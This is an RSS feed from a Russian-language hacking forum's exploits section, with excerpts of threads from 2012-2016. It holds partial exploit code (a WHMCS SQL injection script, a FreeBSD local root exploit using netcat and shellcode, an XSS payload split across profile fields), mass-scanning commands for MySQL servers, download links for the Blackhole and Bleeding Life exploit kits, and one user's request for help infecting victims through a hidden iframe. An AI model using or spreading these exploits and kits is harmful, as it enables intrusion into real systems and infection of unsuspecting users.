<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
  <channel>
    <title>Exploits |:| Vulnerabilities</title>
    <description>Готовые эксплоиты к популярным движкам.</description>
    <pubDate>Sat, 26 Sep 2026 03:06:39 +0000</pubDate>
    <lastBuildDate>Sat, 26 Sep 2026 03:06:39 +0000</lastBuildDate>
    <generator>Хакерский форум: свобода информации, безопасность</generator>
    <link>https://xaker.name/forum/exploits/</link>
    <atom:link rel="self" type="application/rss+xml" href="https://xaker.name/forum/exploits/index.rss"/>
    <item>
      <title>Free Float ftp</title>
      <pubDate>Sun, 30 Oct 2016 13:43:34 +0000</pubDate>
      <link>https://xaker.name/threads/31457/</link>
      <guid>https://xaker.name/threads/31457/</guid>
      <author>invalid@example.com (karencho)</author>
      <dc:creator>karencho</dc:creator>
      <content:encoded><![CDATA[привет всем ,использовал этот эксплоит на виндоус 7 но все время останавливалось  на этом:<br />
<br />
<br />
<br />
<img src="https://xaker.name/data/rehost/untitled1-24227.png" class="bbCodeImage LbImage" alt="[&#x200B;IMG]" data-url="https://xaker.name/data/rehost/untitled1-24227.png" /> <br />
<br />
значит он не может обработать MOF файл даа??? возможно ли как-то его подправить под семерку и виндоус 10?]]></content:encoded>
      <slash:comments>9</slash:comments>
    </item>
    <item>
      <title>Уязвимости в ядре Linux</title>
      <pubDate>Tue, 12 Apr 2016 11:09:53 +0000</pubDate>
      <link>https://xaker.name/threads/12947/</link>
      <guid>https://xaker.name/threads/12947/</guid>
      <author>invalid@example.com (NetSky)</author>
      <dc:creator>NetSky</dc:creator>
      <content:encoded><![CDATA[<b>05 ноября, 2008</b><br />
<br />
<b>Программа:</b> Linux kernel версии до 2.6.28-rc1<br />
<br />
<b>Опасность:</b> Низкая<br />
<br />
<b>Наличие эксплоита:</b> Да<br />
<br />
<b>Описание:</b><br />
Обнаруженные уязвимости позволяют локальному пользователю произвести DoS атаку.<br />
<br />
<b>1.</b> Уязвимость существует из-за недостаточной проверки длины имени каталога в функции &quot;hfsplus_find_cat()&quot; в файле fs/hfsplus/catalog.c. Злоумышленник может смонтировать специально сформированную hfsplus файловую систему и вызвать аварийно...<br />
<br />
<a href="https://xaker.name/threads/12947/" class="internalLink">Уязвимости в ядре Linux</a>]]></content:encoded>
      <slash:comments>18</slash:comments>
    </item>
    <item>
      <title>CAM UnZip 5.1 - Archive Path Traversal</title>
      <pubDate>Mon, 11 Apr 2016 23:48:28 +0000</pubDate>
      <link>https://xaker.name/threads/31187/</link>
      <guid>https://xaker.name/threads/31187/</guid>
      <author>invalid@example.com (v1nest)</author>
      <dc:creator>v1nest</dc:creator>
      <content:encoded><![CDATA[Не менее интересный эксплойт:<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt


Vendor:
=================
www.camunzip.com


Product:
==============
CAM UnZip v5.1


Vulnerability Type:
======================
Archive Path Traversal


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

CAM UnZip fails to check that the paths of the files in the archive...</pre>
</div><a href="https://xaker.name/threads/31187/" class="internalLink">CAM UnZip 5.1 - Archive Path Traversal</a>]]></content:encoded>
    </item>
    <item>
      <title>проблема с metasploit</title>
      <pubDate>Sat, 06 Feb 2016 07:41:35 +0000</pubDate>
      <link>https://xaker.name/threads/27955/</link>
      <guid>https://xaker.name/threads/27955/</guid>
      <author>invalid@example.com (GK104)</author>
      <dc:creator>GK104</dc:creator>
      <content:encoded><![CDATA[Здравствуйте, столкнулся с такой проблемой:<br />
Захожу в консоль метасплойта с GUI, нажимаю start new msfrpcd, начинается соединение, проходит минута и мне выдается такая ошибка:<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>msfrpcd died with exit value 1</pre>
</div>Гуглил, натыкался лишь на советы переустановить метасплойт, переустанавливал, проблема осталась.Антивирус был выключен, юзаю win8.<br />
Посоветуйте что-нибудь, пожалуйста.]]></content:encoded>
      <slash:comments>4</slash:comments>
    </item>
    <item>
      <title>Piwigo 2.6.0 (picture.php, rate param) - SQL Injection</title>
      <pubDate>Fri, 14 Nov 2014 04:15:37 +0000</pubDate>
      <link>https://xaker.name/threads/29947/</link>
      <guid>https://xaker.name/threads/29947/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>
Piwigo 2.6.0 (picture.php, rate param) - SQL Injection 

=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised: November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo &lt;= v2.6.0

II. BACKGROUND
-------------------------
Piwigo is a web...</pre>
</div><a href="https://xaker.name/threads/29947/" class="internalLink">Piwigo 2.6.0 (picture.php, rate param) - SQL Injection</a>]]></content:encoded>
    </item>
    <item>
      <title>WHMCS 5.2.7 SQL Injection</title>
      <pubDate>Mon, 07 Oct 2013 06:44:40 +0000</pubDate>
      <link>https://xaker.name/threads/29190/</link>
      <guid>https://xaker.name/threads/29190/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker' 

import urllib, re, sys
from urllib2 import Request, urlopen
ua = &quot;Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36&quot;

def exploit(sql):
print...</pre>
</div><a href="https://xaker.name/threads/29190/" class="internalLink">WHMCS 5.2.7 SQL Injection</a>]]></content:encoded>
    </item>
    <item>
      <title>Xss в хаке Extra IM and Network</title>
      <pubDate>Thu, 03 Oct 2013 03:34:15 +0000</pubDate>
      <link>https://xaker.name/threads/26267/</link>
      <guid>https://xaker.name/threads/26267/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[сам хак _http://vbsupport.org/forum/showthread.php?t=41919<br />
не фильтруется не одна переменная<br />
ну а теперь о том как юзать)<br />
<br />
в usercp<br />
Редактировать данные:<br />
Имя в AIM	- 1<br />
Имя в М-Агент - &lt;script&gt; /*<br />
Имя или ID в Вконтакте - */ alert(1); /*<br />
Имя на YouTube - 5<br />
Имя в Мой Мир (домен/имя) - 4<br />
Имя или ID в Myspace - */&lt;/script&gt;]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>нужен эксплоит повышения привелегий в XP</title>
      <pubDate>Wed, 28 Aug 2013 17:09:49 +0000</pubDate>
      <link>https://xaker.name/threads/27813/</link>
      <guid>https://xaker.name/threads/27813/</guid>
      <author>invalid@example.com (weedov)</author>
      <dc:creator>weedov</dc:creator>
      <content:encoded><![CDATA[пробывал  <a href="http://www.exploit-db.com/sploits/KiTrap0D.zip" target="_blank" class="externalLink" rel="nofollow">http://www.exploit-db.com/sploits/KiTrap0D.zip</a> <br />
<br />
подскажыте плс если ести чтото 100% рабочее. спасибо<br />
<br />
Windows XP Professional SP3 x86 (5.1, Build 2600)]]></content:encoded>
      <slash:comments>2</slash:comments>
    </item>
    <item>
      <title>Smoke Loader SQL Injection</title>
      <pubDate>Mon, 26 Aug 2013 11:00:12 +0000</pubDate>
      <link>https://xaker.name/threads/27633/</link>
      <guid>https://xaker.name/threads/27633/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeQuote">
	<aside>
		
		<blockquote class="quoteContainer"><div class="quote">Like other http-based exploit kits, I&#039;ve discovered that the smoke loader malware downloader has a sql injection in its C&amp;C administration panel that can be used to revel the administrator&#039;s password.<br />
<br />
sqlmap can identify the vulnerable parameter with the string:</div><div class="quoteExpand">Нажмите, чтобы раскрыть...</div></blockquote>
	</aside>
</div>

<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>root@localhoost:/opt/pentest/database/sqlmap#  ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3
--risk 3


sqlmap identified the...</pre>
</div><a href="https://xaker.name/threads/27633/" class="internalLink">Smoke Loader SQL Injection</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Cometchat - Multiple Vulnerabilities</title>
      <pubDate>Fri, 15 Feb 2013 16:42:15 +0000</pubDate>
      <link>https://xaker.name/threads/27860/</link>
      <guid>https://xaker.name/threads/27860/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>__ _ _ ____ 
/ /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _
__ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / 
/____/ 
##################################################################################	
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which...</pre>
</div><a href="https://xaker.name/threads/27860/" class="internalLink">Cometchat - Multiple Vulnerabilities</a>]]></content:encoded>
    </item>
    <item>
      <title>Exploit Pack Bleeding Life 2</title>
      <pubDate>Tue, 22 Jan 2013 19:07:03 +0000</pubDate>
      <link>https://xaker.name/threads/23781/</link>
      <guid>https://xaker.name/threads/23781/</guid>
      <author>invalid@example.com (zeoman)</author>
      <dc:creator>zeoman</dc:creator>
      <content:encoded><![CDATA[<div style="text-align: center"><a href="http://www.radikal.ru" target="_blank" class="externalLink" rel="nofollow"><img src="https://xaker.name/data/proxy/4000-adc9a6d44f28.png" class="bbCodeImage LbImage" alt="[&#x200B;IMG]" data-url="https://xaker.name/data/proxy/4000-adc9a6d44f28.png" /></a>&#8203;</div><br />
<b>Exploits</b><br />
<b>Adobe</b><br />
CVE-2008-2992<br />
CVE-2010-1297<br />
CVE-2010-2884<br />
CVE-2010-0188<br />
<b>Java</b><br />
CVE-2010-0842<br />
CVE-2010-3552<br />
Signed Applet<br />
<br />
<a href="http://www.blackhatacademy.org/security101/index.php?title=Bleeding_Life" target="_blank" class="externalLink" rel="nofollow">Официальный сайт</a><br />
<br />
<a href="http://www.sendspace.com/file/4krg31" target="_blank" class="externalLink" rel="nofollow">Скачать</a><br />
<br />
<b>P.S.</b> Пока не тестил так что не могу сказать какой % пробива.]]></content:encoded>
      <slash:comments>44</slash:comments>
    </item>
    <item>
      <title>MySQL Scanner &amp; MySQL Server for Windows Remote SYSTEM Level Exploit</title>
      <pubDate>Tue, 04 Dec 2012 19:04:34 +0000</pubDate>
      <link>https://xaker.name/threads/27555/</link>
      <guid>https://xaker.name/threads/27555/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><span style="font-size: 12px">MySQL Scanner &amp; MySQL Server for Windows Remote SYSTEM Level Exploit</span></b><br />
<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>Version 1.0
By Kingcope
In the Year of 2012</pre>
</div><a href="http://www.exploit-db.com/sploits/23083.zip" target="_blank" class="externalLink" rel="nofollow">http://www.exploit-db.com/sploits/23083.zip</a><br />
 <br />
use this on a fast scan server!<br />
 <br />
How to use.<br />
<b>pnscan:</b><br />
 <br />



<div class="bbCodeBlock bbCodeQuote">
	<aside>
		
		<blockquote class="quoteContainer"><div class="quote">the file &quot;accounts&quot; holds the user/password combinations to try.<br />
hits are saved in the file &quot;jack.pot&quot;.</div><div class="quoteExpand">Нажмите, чтобы раскрыть...</div></blockquote>
	</aside>
</div>

<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>#make lnx
#./pnscan 192.168.0.0/16 3306</pre>
</div><b>exploit:</b><br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>#perl...</pre>
</div><a href="https://xaker.name/threads/27555/" class="internalLink">MySQL Scanner &amp; MySQL Server for Windows Remote SYSTEM Level Exploit</a>]]></content:encoded>
    </item>
    <item>
      <title>MySQL Local/Remote FAST Account Password Cracking</title>
      <pubDate>Tue, 04 Dec 2012 07:27:12 +0000</pubDate>
      <link>https://xaker.name/threads/27550/</link>
      <guid>https://xaker.name/threads/27550/</guid>
      <author>invalid@example.com (Mei)</author>
      <dc:creator>Mei</dc:creator>
      <content:encoded><![CDATA[Эксплоит для быстрого перебора паролей (локально и удаленно) MySQL из-под непривилегированного пользователя со скоростью около 5000 паролей в секунду. Основывается на функции change_user<br />
<br />
<b>Описание:</b><br />



<div class="bbCodeBlock bbCodeQuote">
	<aside>
		
		<blockquote class="quoteContainer"><div class="quote">FAST Cracking of MySQL account passwords locally or over the network (post-auth)<br />
<br />
(to the maintainers: you don&#039;t need to patch this, looks alot like a<br />
minor bug, prolly documented <img src="styles/default/xenforo/clear.png" class="mceSmilieSprite mceSmilie8" alt=":D" title="Big Grin    :D" />)<br />
<br />
I found a method to crack mysql user passwords locally or over the<br />
network pretty...</div><div class="quoteExpand">Нажмите, чтобы раскрыть...</div></blockquote>
	</aside>
</div><a href="https://xaker.name/threads/27550/" class="internalLink">MySQL Local/Remote FAST Account Password Cracking</a>]]></content:encoded>
    </item>
    <item>
      <title>MyAuth3 Blind SQL Injection</title>
      <pubDate>Tue, 09 Oct 2012 10:38:09 +0000</pubDate>
      <link>https://xaker.name/threads/27269/</link>
      <guid>https://xaker.name/threads/27269/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><div style="text-align: center"><span style="font-size: 12px">MyAuth3 Blind SQL Injection</span>&#8203;</div></b><br />
<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre># Google Dork: allinurl:1881/?console=panel
# Date: 09/06/2011
# Author: Marcio Almeida (marcio[at]alligatorteam[dot]
org | @marcioalm)
# Version: 3.0
# Tested on: Linux

#EDB-Note: apparently no true exploit is needed to dump system pwd hashes, because the admin myauth users have the ability to run a terminal session</pre>
</div><b>PoC (POST data)</b><br />
<br />
<b>URL:</b>...<br />
<br />
<a href="https://xaker.name/threads/27269/" class="internalLink">MyAuth3 Blind SQL Injection</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Уязвимости FreeBSD</title>
      <pubDate>Tue, 11 Sep 2012 09:55:06 +0000</pubDate>
      <link>https://xaker.name/threads/19227/</link>
      <guid>https://xaker.name/threads/19227/</guid>
      <author>invalid@example.com (Iindigo)</author>
      <dc:creator>Iindigo</dc:creator>
      <content:encoded><![CDATA[<b>FreeBSD 7.*, 8.* root exploit</b><br />
<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>/*  freebsd x86/x64 sendfile cache local root xpl v2
 
 by Kingcope
 2010
 --
 
 should h4x any freebsd 8.* and 7.* prior to 12Jul2010
 
 tampers /bin/sh to contain a shellcode which does
 '
 chmod a+s /tmp/sh
 chown root /tmp/sh
 execve /tmp/sh2
 '
 
 how to use:
 
 terminal 1:
 $ cp /bin/sh /tmp/sh
 $ cp /bin/sh /tmp/sh2
 $ gcc cache.c -o cache
 
 terminal 2:
 $ nc -l 7030
 
 terminal 1:
 for i386 arch type:
 $...</pre>
</div><a href="https://xaker.name/threads/19227/" class="internalLink">Уязвимости FreeBSD</a>]]></content:encoded>
      <slash:comments>5</slash:comments>
    </item>
    <item>
      <title>Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории</title>
      <pubDate>Sat, 23 Jun 2012 09:49:02 +0000</pubDate>
      <link>https://xaker.name/threads/26425/</link>
      <guid>https://xaker.name/threads/26425/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><div style="text-align: center">Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1&#8203;</div></b><br />
<br />
Livestreet XSS POST:<br />
<br />
File: <br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>/engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/year.php</pre>
</div>

<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>/engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php </pre>
</div>

<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d;...</pre>
</div><a href="https://xaker.name/threads/26425/" class="internalLink">Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории</a>]]></content:encoded>
    </item>
    <item>
      <title>Cpanel 11.X Multiple CSRF Vulnerability</title>
      <pubDate>Wed, 06 Jun 2012 21:44:40 +0000</pubDate>
      <link>https://xaker.name/threads/26290/</link>
      <guid>https://xaker.name/threads/26290/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><div style="text-align: center"><span style="font-size: 12px"><span style="color: Lime">Cpanel 11.X Multiple CSRF Vulnerability</span></span>&#8203;</div></b><br />
<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################</pre>
</div><b>[ Exploit ]</b><br />
<br />
<br />
<b>Добавить файл</b>...<br />
<br />
<a href="https://xaker.name/threads/26290/" class="internalLink">Cpanel 11.X Multiple CSRF Vulnerability</a>]]></content:encoded>
    </item>
    <item>
      <title>Blackhole Exploit Kit 1.0.2</title>
      <pubDate>Mon, 04 Jun 2012 13:32:05 +0000</pubDate>
      <link>https://xaker.name/threads/23784/</link>
      <guid>https://xaker.name/threads/23784/</guid>
      <author>invalid@example.com (Glam_Man)</author>
      <dc:creator>Glam_Man</dc:creator>
      <content:encoded><![CDATA[<div style="text-align: center"><a href="http://fastpic.ru/view/30/2011/1030/f20fb7bd12ce26d708bbe50f4448accc.png.html" target="_blank" class="externalLink" rel="nofollow"><img src="https://xaker.name/data/proxy/3385-f20fb7bd12ce26d708bbe50f4448accc.jpeg" class="bbCodeImage LbImage" alt="[&#x200B;IMG]" data-url="https://xaker.name/data/proxy/3385-f20fb7bd12ce26d708bbe50f4448accc.jpeg" /></a>&#8203;</div><b>Exploits:</b><br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885" target="_blank" class="externalLink" rel="nofollow">CVE-2010-1885</a>   HCP<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1423" target="_blank" class="externalLink" rel="nofollow">CVE-2010-1423</a>   Java argument injection vulnerability in the URI handler in Java NPAPI plugin...<br />
<br />
<a href="https://xaker.name/threads/23784/" class="internalLink">Blackhole Exploit Kit 1.0.2</a>]]></content:encoded>
      <slash:comments>21</slash:comments>
    </item>
    <item>
      <title>Обход ограничений безопасности в PHP</title>
      <pubDate>Thu, 10 May 2012 14:22:21 +0000</pubDate>
      <link>https://xaker.name/threads/26015/</link>
      <guid>https://xaker.name/threads/26015/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><div style="text-align: center"><span style="font-size: 12px">PHP-CGI EXPLOIT: CVE-2012-1823, POC EXPLOIT</span>&#8203;</div></b><br />
<br />
<b>Уязвимые версии:</b><br />
PHP 5.3.11 и более ранние версии <br />
PHP 5.4.1 и более ранние версии<br />
<br />
<b>Описание: </b><br />
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности на системе.<br />
<br />
Уязвимость существует из-за того, что при использовании основанной на CGI настройки php-cgi получает обработанную строку пареметра запроса в виде аргумента командной строки, что позволяет передавать...<br />
<br />
<a href="https://xaker.name/threads/26015/" class="internalLink">Обход ограничений безопасности в PHP</a>]]></content:encoded>
      <slash:comments>5</slash:comments>
    </item>
    <item>
      <title>Плохой интернет и сплоит пак</title>
      <pubDate>Thu, 03 May 2012 05:10:05 +0000</pubDate>
      <link>https://xaker.name/threads/25884/</link>
      <guid>https://xaker.name/threads/25884/</guid>
      <author>invalid@example.com (Megatron13)</author>
      <dc:creator>Megatron13</dc:creator>
      <content:encoded><![CDATA[Собственно вопрос такой. У меня очень плохой инет и из-за этого ко мне подключится можно не сразу. А мне нужно чтобы жертва подключилась и 100% заразила свой комп с помощью моего сплоит пака. что делать то? <br />
з.ы. заражать буду через скрытый фрейм, спрятанный на довольно нормальном сайте.]]></content:encoded>
      <slash:comments>9</slash:comments>
    </item>
  </channel>
</rss>
